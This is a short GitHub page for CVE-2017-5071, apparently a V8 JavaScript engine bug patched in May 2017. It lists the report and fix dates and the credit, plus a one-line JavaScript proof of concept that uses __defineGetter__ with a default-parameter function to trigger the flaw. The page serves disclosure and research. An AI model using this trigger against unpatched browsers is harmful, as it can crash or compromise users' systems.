Skip to content

Latest commit

 

History

History
16 lines (11 loc) · 245 Bytes

CVE-2017-5071.md

File metadata and controls

16 lines (11 loc) · 245 Bytes

CVE-2017-5071

  • Report: Apr 2017
  • Fix: May 2017
  • Credit: Choongwoo Han

PoC

this.__defineGetter__("x", (a = (function f() { return; (function() {}); })()) => { });
x;

Reference